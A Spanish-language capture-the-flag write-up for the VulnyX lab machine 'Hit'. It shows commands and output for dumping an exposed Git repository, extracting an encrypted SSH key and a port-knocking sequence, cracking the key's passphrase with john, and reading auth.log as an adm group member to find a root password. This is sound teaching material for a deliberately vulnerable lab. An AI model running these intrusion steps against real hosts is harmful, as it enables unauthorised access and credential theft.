cd ~/blog

~/writeups/vulnyx/08-hit.md

08 - Hit

easy Linux vulnyx 11-02-2025
Exposed .git repositoryPort knocking (SSH hidden)SSH key passphrase crackingadm group log reading Privesc
vulnyx.com

~1 min de lectura


Enumeramos puertos:

 nmap -sCV -p 80 -oN 02-targeted.txt 192.168.1.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 19:50 -03
Nmap scan report for 192.168.1.53
Host is up (0.00032s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
| http-git:
|   192.168.1.53:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Commit #5

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.35 seconds

Hay un repositorio Git expuesto. Lo descargamos y revisamos el historial de commits con show, donde encontramos una clave SSH privada y, lo más interesante, la configuración de port knocking (la secuencia que abre el puerto 22):

git log | grep commit | cut -d ' ' -f2 | xargs git show
Author: charlie <charlie@hit.nyx>
-----BEGIN OPENSSH PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,3E2B3558346EF63A
...
-----END OPENSSH PRIVATE KEY-----

-[options]
-       UseSyslog
-
-[openSSH]
-       sequence    = 65535,8888,54111
-       seq_timeout = 1
-       command     = /usr/sbin/service ssh start

-       sequence    = 7000,8000,9000
-       seq_timeout = 5
-       command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
-       tcpflags    = syn
-
-[closeSSH]
-       sequence    = 9000,8000,7000
-       seq_timeout = 5
-       command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
-       tcpflags    = syn
-
-[openHTTPS]
-       sequence    = 12345,54321,24680,13579
-       seq_timeout = 5
-       command     = /usr/local/sbin/knock_add -i -c INPUT -p tcp -d 443 -f %IP%
-       tcpflags    = syn

Realizamos el knock en la secuencia indicada para abrir el puerto 22:

 knock -v 192.168.1.53 65535 8888 54111
hitting tcp 192.168.1.53:65535
hitting tcp 192.168.1.53:8888
hitting tcp 192.168.1.53:54111

 nmap -sCV -p 22 192.168.1.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 20:37 -03
Nmap scan report for 192.168.1.53
Host is up (0.00023s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds

Crackeamos la passphrase de la clave con john y nos conectamos como charlie:

 ssh2john.py id_rsa > hash
 john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
charlie1         (id_rsa)
...

 ssh charlie@192.168.1.53 -i id_rsa
Enter passphrase for key 'id_rsa': charlie1
charlie@hit:~$

Para escalar privilegios, revisamos nuestros grupos:

charlie@hit:/$ id
uid=1000(charlie) gid=1000(charlie) grupos=1000(charlie),4(adm)

Pertenecemos al grupo adm (Privileged Groups Privesc), que permite leer los logs del sistema. Buscamos credenciales filtradas en auth.log y encontramos una contraseña que se introdujo por error como nombre de usuario en un intento de login:

charlie@hit:/var/log$ cat auth.log | grep pass
...
2025-02-03T09:50:56.693974+01:00 hit sshd[701]: Failed password for invalid user r00tP4zzw0rd from 192.168.1.10 port 45796 ssh2
...

Usamos esa contraseña para autenticarnos como root:

charlie@hit:/var/log$ su root
Contraseña: r00tP4zzw0rd
root@hit:/var/log#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados